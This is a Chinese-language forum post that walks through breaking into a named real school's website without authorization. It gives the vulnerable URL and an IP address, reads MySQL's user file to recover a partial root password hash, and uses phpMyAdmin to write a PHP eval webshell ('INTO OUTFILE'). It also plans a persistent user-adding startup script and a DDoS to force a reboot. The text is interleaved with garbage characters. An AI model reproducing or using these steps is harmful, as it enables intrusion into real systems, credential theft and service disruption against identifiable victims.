友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
' {  `$ O1 e; J  F$ y发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
& j9 w( f) s8 o# q  v* n

6 g# f" X! F" X4 a  H4 I+ b( ?
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
! w4 A7 Y5 z5 n. Z
那么想可以直接写入shell ，getshell有几个条件：
& K. Y" L0 k! e7 C2 b+ C2 W. u

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
! n; Q5 p( N: x, i
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
1 ~4 E& f0 U/ w3 B  ]4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 I* w- V4 A: U" `5 Q6 d( W2 [5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7 z9 ^# e7 [- J+ n$ [) R3 ]7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

' h+ p1 K2 \' h5 X# Z$ U5 M" J均不行...........................
) \0 {8 K. g0 h; r
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
9 W7 {' B; H$ e" F9 m1 \4 M2 G
" y( ?! L; n  ?7 K( q% I权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

  X/ M# Q1 s* H: R5 M敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
9 ]. `% D! v" P/ [
" ~) W4 N& ?6 h( T9 \4 o0 G想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
$ f- w/ Y& `, j/ F5 v
2 @, j+ B% S; e, Bhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
) j6 Q. y) R/ X
" c) ^; h( y; V# l' t3 j* z  g自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
( ^# D/ r" |' t/ E# a
0 ^1 W' j4 ]! H成功读到root密码：

17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
2 ]* _4 Z, p1 N! u* {21---- *(002a)
22---- 8(0038)
23---- 2(0032)
3 v5 E9 P- i2 H24---- E(0045)
25---- 1(0031)
' t. N' ?' h( P) |3 K* @26---- C(0043)
27---- 5(0035)
8 V2 F8 v" w# p, z0 q7 ~28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
" C1 ]; d" C, H0 a$ V, v7 ^& @31---- A(0041)
: v9 W  `; G$ R( S8 C2 W* w: p2 N% C32---- 9(0039)
. G# B( [, n+ v( S, p4 v" s. A( a33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
. Q: r$ v$ C/ x2 v38---- 4(0034)
: I! f& a& J' D% W' R* X  Z0 ]39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
9 f5 z# `) m0 j6 {4 s5 v42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
+ I6 u/ {0 U! j45---- 9(0039)
" e7 S2 N! T4 w46---- 8(0038)
47---- F(0046)
48---- F(0046)
. }  C: g% p# h# |0 d( f$ I. t+ `' a! H49---- 4(0034)
50---- F(0046)
* C4 m, B" I4 N51---- 0(0030)
52---- 3(0033)
( m# z' Q- D' s& ]8 K+ H5 Q53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
( q% M# P; u# q6 ]4 O5 {57---- B(0042)
/ B* [0 d3 }/ z8 b$ |( u8 ?! a58---- *(0044)
59---- *(0035)
3 b- Z+ L/ v4 e( d  r0 o2 Y60---- *(0041)
61---- *0032)
8 q* d- Y$ k, z7 F3 `
& q8 k  L9 ?3 f7 n+ y) D解密后成功登陆phpmyamin
  u; S6 s  ^  a, d" f0 F                          
) V2 N" J- ^5 h3 s; W8 C5 ]# N( }
                             
1 \) q1 @0 T: z  E, B7 C# Q: A: P
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

9 u% ^6 ]$ u  C# [+ S成功执行，拿下shell，菜刀连接：

7 ]! Q$ u) M+ o% }% F服务器不支持asp,aspx,php提权无果...................

$ G* z% p; {4 g& L7 N但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

9 F  w; G) J6 {1 H; \" C0 f

-------------------------------------------------------------------------------
admin
' q  S1 j/ E2 qAdministrator
slipper$
/ b& y: T2 W3 {5 W5 t: @sqluser
命令成功完成。
) |( P& q" c4 s2 G+ f  h
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
) v3 f4 {. a7 K$ b+ o$ f: B
$ V/ t& ~+ X; r: N) hddos服务器重启，不然就只能坐等服务器重启了...............................
. q' M" o  @5 v4 O
      

0 g1 u" a+ q5 P

angel